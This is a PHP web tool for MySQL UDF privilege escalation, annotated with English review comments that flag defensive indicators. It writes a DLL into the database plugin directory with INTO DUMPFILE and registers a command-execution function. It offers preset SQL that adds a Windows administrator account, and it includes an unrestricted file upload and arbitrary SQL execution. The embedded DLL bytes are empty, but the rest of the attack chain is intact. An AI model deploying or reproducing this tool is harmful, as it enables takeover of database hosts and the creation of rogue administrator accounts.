<?php
// Turn off all PHP error reporting, so warnings and notices from the calls
// below are neither displayed nor logged by PHP.
error_reporting(0);
// Legacy compatibility shim: when magic_quotes_gpc is active, undo the
// automatic backslash escaping on every request superglobal so that the
// values used later in this file arrive exactly as the client sent them.
// NOTE(review): get_magic_quotes_gpc() has always returned false since
// PHP 5.4 and was removed in PHP 8.0, which dates this script to legacy PHP.
if (get_magic_quotes_gpc()) {
// Recursively apply stripslashes() to a scalar or to every leaf of a nested
// array and return the un-escaped value.
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
// Start (or resume) a PHP session; $_SESSION['path'] is written further down.
session_start();
// Logout: expire every connect[...] cookie and redirect back to this script.
// NOTE(review): there is no exit after header(), so the rest of the script
// still runs on the logout request.
if($_GET['action']=='logout'){
foreach($_COOKIE["connect"] as $key=>$value){
setcookie("connect[$key]","",time()-1);
}
header("Location:".$_SERVER["SCRIPT_NAME"]);
}
// Login form handler: copy the posted database host, user name, password and
// database name into cookies. setcookie() is called with name and value only,
// so no expiry, path, Secure or HttpOnly attribute is set, and the database
// password travels in clear text in the Cookie header of every later request.
// For defenders this makes "connect[host]" / "connect[pass]" cookie names a
// usable indicator in proxy or web-server logs that record cookies.
if(!empty($_POST['submit'])){
setcookie("connect");
setcookie("connect[host]",$_POST['host']);
setcookie("connect[name]",$_POST['name']);
setcookie("connect[pass]",$_POST['pass']);
setcookie("connect[dbname]",$_POST['dbname']);
// Client-side redirect to the connected view.
echo "<script>location.href='?action=connect'</script>";
}
// Commented-out debugging aid that would print each stored cookie value.
/*
foreach($_COOKIE["connect"] as $key=>$value){
echo $key.":".$value."<br>";
}
*/
// Without an "action" query parameter the script stops here. In this copy the
// closing/opening tag pair below encloses no markup, so nothing is rendered
// (presumably the login form HTML was stripped from the page; not verifiable
// from here).
if(empty($_GET["action"])){
?>
<?php
exit;
}
// Connect to MySQL using the host, user and password taken from the
// client-controlled cookies; "@" hides the connection warning.
// NOTE(review): the mysql_* functions (ext/mysql) were removed in PHP 7.0,
// so this file only runs on older interpreters.
$link=@mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
if(!$link){
// Connection failed: print the driver error and a "go back" link.
echo "连接失败.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
exit;
}else{
// Banner text reads "Mysql privilege escalation tool". The banner and the
// fixed library name "msxtest.dll" used below are stable strings that can
// serve as static signatures when scanning web roots for this file.
echo "</br><h4>Mysql 提权工具 Code by msx2009</h4>";
echo "</br>连接成功 ";
$str=mysql_get_server_info();
echo 'MYSQL版本:'.$str." ";
// $str[2] is the third character of the server version string (presumably
// the minor version digit of an "X.Y.Z" string). When it is >= 1 the target
// path is built from the server's plugin_dir variable; otherwise a fixed
// C:/WINDOWS path is used. The chosen path is also stored in the session.
if($str[2]>=1){
$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
$row=mysql_query($sql);
$rows=mysql_fetch_row($row);
// Normalise Windows backslashes to forward slashes.
$pa=str_replace('\\','/',$rows[1]);
$path=$_SESSION['path']=$pa."/msxtest.dll";
}else{
$path=$_SESSION['path']='C:/WINDOWS/msxtest.dll';
}
}
// Select the database named in the cookie; stop with the driver error if it
// cannot be selected.
$conn=mysql_select_db($_COOKIE["connect"]["dbname"],$link);
if(!$conn){
echo "数据不存在.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
exit;
}else{
// The cookie value is echoed into the page without HTML escaping.
echo "数据库--".$_COOKIE['connect']['dbname']."--存在 ";
}
// Logout link plus a multipart upload form. The "p" text field is pre-filled
// with this script's own directory, which also discloses the server-side path.
echo '<a href="?action=logout">退出</a>';
echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
echo "当前路径:<input name='p' type='text' value='".dirname(__FILE__)."\'> ";
echo '<input type="file" name="file">';
echo '<input type="submit" name="subfile" value="上传文件">';
echo'</form>';
// Upload handler: the destination is the client-supplied directory "p"
// concatenated with the client-supplied file name. No check is made on the
// directory, the file name, the extension or the content, so this writes an
// arbitrary file wherever the web-server account has write permission.
// Defensive relevance: files created by the web-server process outside the
// expected upload locations are a strong host-side indicator, and a web root
// that is not writable by that account blocks this step.
if($_POST['subfile']){
$upfile=$_POST['p'].$_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name']))
{
if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
echo '上传失败';
}else{
echo '上传成功,路径为'.$upfile;
}
}
}
// Form showing the computed library path with an "export udf" button.
echo '<form action="?action=dll" method="post"/>';
echo '路径目录为';
echo "<input type='text' name='dll' size='40' value='$path'/>";
echo '<input type="submit" name="subudf" value="导出udf"/>';
echo '</form>';
// Export handler. Sequence visible here:
//   1. drop and recreate a one-column BLOB staging table Temp_udf,
//   2. insert the hex literal returned by udfcode(),
//   3. SELECT ... INTO DUMPFILE to write that blob to $path on the database
//      server's file system,
//   4. drop the staging table again.
// The write uses the server-computed $path; the posted "dll" field is not
// read in the visible code.
// Defensive relevance: INTO DUMPFILE needs the MySQL FILE privilege and is
// constrained by secure_file_priv, so revoking FILE from application
// accounts, setting secure_file_priv, and keeping plugin_dir non-writable for
// the mysqld service account each break this step. Short-lived tables named
// Temp_udf and INTO DUMPFILE statements are visible in query/audit logs.
if($_POST['subudf']){
mysql_query('DROP TABLE Temp_udf');
$query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
if(!$query){
echo '创建临时表Temp_udf失败请查看失败内容'.mysql_error();
}else{
$shellcode=udfcode();
$query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
if(!mysql_query($query)){
echo 'udf插入失败请查看失败内容'.mysql_error();
}else{
$query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
if(!mysql_query($query)){
echo 'udf导出失败请查看失败内容'.mysql_error();
}else{
mysql_query('DROP TABLE Temp_udf');
echo '导出成功';
}
}
}
}
// Form for a "custom path" export, pre-filled with C:/WINDOWS/diy.dll.
echo '<form name="form2" method="post" action="">';
echo '自定义路径:';
echo '<input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll">';
echo '<input type="submit" name="Submit2" value="自定义导出">';
echo '</form>';
// Handler keyed on a non-empty POST field "diy". It stages the content of a
// file that the database server can read (load_file) in table diy_dll and
// writes it back out with INTO DUMPFILE to the posted "diypath".
// Both posted values are interpolated into the SQL text after nothing more
// than a backslash-to-slash replacement.
// Defensive relevance: load_file() and INTO DUMPFILE both depend on the FILE
// privilege and on secure_file_priv; the table name diy_dll and the
// hex(load_file(...)) pattern are recognisable in query/audit logs.
if(!empty($_POST['diy'])){
$diy=str_replace('\\','/',$_POST['diy']);
$diypath=str_replace('\\','/',$_POST['diypath']);
mysql_query('DROP TABLE diy_dll');
$s='create table diy_dll (cmd LONGBLOB)';
if(!mysql_query($s)){
echo '创建diy_dll表失败'.mysql_error();
}else{
$s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
if(!mysql_query($s)){
echo "插入自定义文件失败".mysql_error();
}else{
$s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
if(!mysql_query($s)){
echo "导出自定义dll出错".mysql_error();
}else{
mysql_query('DROP TABLE diy_dll');
echo "成功出自定义dll<br>";
}
}
}
}
// "Built-in commands" drop-down. Each option value is a complete SQL
// statement posted in the "mysql" field: one registers a user-defined
// function named msx from msxtest.dll, the others call it with operating
// system commands (one of them creates a local account and adds it to the
// administrators group), and the last drops the function again.
// Defensive relevance: CREATE FUNCTION ... SONAME statements, unexpected rows
// in mysql.func, and the database service spawning command-line child
// processes are the observable traces of this stage.
echo '自带命令:<br>';
echo '<form action="" method="post">';
echo '<select name="mysql">';
echo '<option value="create function msx returns string soname \'msxtest.dll\'">创建msx</option>';
echo '<option value="select msx(\'net user $msx 123456 /add & net localgroup administrators $msx /add\')">添加超级管理员</option>';
echo '<option value="select msx(\'net user\')">查看用户</option>';
echo '<option value="select msx(\'netstat -an\')">查看端口</option>';
echo '<option value="drop function msx ">删除msx</option>';
echo '</select>';
echo '<input type="submit" value="提交" />';
echo '</form>';
// Free-form SQL box; it posts to the same "mysql" field as the drop-down.
echo '<form action="?action=sql" method="post">';
echo '自定义SQL语句: Example:select msx(\'ipconfig\')<br>';
echo '<textarea name="mysql" cols="100" rows="3"></textarea>';
echo '</br><input type="submit" value="执行" />';
echo '</form>';
echo "执行结果:<br>";
echo '<textarea cols="100" rows="5" id="contactus" name="contactus">';
// Execute whatever arrived in POST "mysql" verbatim on the open connection
// and print every column of every result row, unescaped, into the textarea.
// The assignment inside the echo stores the posted text plus "\r\n" in $sql
// before it is passed to mysql_query(); a failing query ends the script with
// the driver error.
if(!empty($_POST['mysql'])){
echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
$sql=mysql_query($sql) or die(mysql_error());
while($rows=@mysql_fetch_row($sql)){
foreach($rows as $value){
echo $value;
}
}
}
echo '</textarea><br>';
echo '<hr>';
// Footer help text: states that the library exposes a single function, msx,
// which runs a system command passed as its argument.
print("
功能说明:<br>
此udf只内置一个函数msx,用于执行系统命令,执行 select msx('命令')
例如: select msx('net user');
");
// Returns the hex literal that the export handler inserts into Temp_udf.
// In this copy the literal is only the "0x" prefix with no bytes after it, so
// no library content is embedded here (presumably removed before publication;
// not verifiable from this file).
function udfcode(){
return "0x";
}
?>